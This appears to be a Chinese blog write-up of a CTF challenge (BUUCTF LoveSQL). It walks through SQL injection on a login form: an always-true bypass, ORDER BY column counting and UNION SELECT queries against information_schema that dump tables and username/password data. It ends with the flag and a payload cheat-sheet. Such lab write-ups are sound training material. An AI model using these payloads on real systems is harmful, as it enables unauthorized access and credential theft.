第八题——[极客大挑战 2019]LoveSQL

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,两栏输入框,使用全真语句进行测试

用户名输入a' or '1'='1密码输入b' or '1'='1,出现一个字符串,提交flag提示错误,说明这个字符串不是flag
在这里插入图片描述
在这里插入图片描述

第二步:查看是否存在堆叠注入

在用户名和密码都输入admin';show tables;发现不存在堆叠注入。
在这里插入图片描述
在这里插入图片描述

第三步:使用order by确定回显点

  1. 在用户名一栏输入1' order by 3#,密码一栏输入1,提交无异常。
    在这里插入图片描述
    在这里插入图片描述

  2. 在用户名一栏输入1' order by 4#,密码一栏输入1,提交发现异常。
    在这里插入图片描述
    在这里插入图片描述

结论:可以显示3个字段

第四步:使用union select获取数据

  1. 在用户名一栏输入1' union select 1,2,3#,密码输入1进行试探,发现在2,3点出显示数据
    在这里插入图片描述
    在这里插入图片描述

  2. 对表名进行爆破,用户名一栏输入1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#密码一栏输入1,显示出表名。
    在这里插入图片描述
    在这里插入图片描述

  3. 对字段名进行爆破,输入1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#,显示出三个字段名
    在这里插入图片描述

  4. 输入1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#显示数据,发现flag:flag{17de2610-1f0f-4623-a20a-d785d85b4279}
    在这里插入图片描述

sql语法

  1. order by 3#用于确定几个字段
  2. union select 1,2,3#用于确定回显点
  3. union select 1,2,database()#用于确定当前数据库名称
  4. union select 1,2,group_concat(schema_name) from information_schema.schemata#用于查看所有数据库名称
  5. union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#用于都确定表名
  6. 1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’#用于确定字段名
  7. 1’ union select 1,2,group_concat(id,username,password) from (databasename.tablename)#输出数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值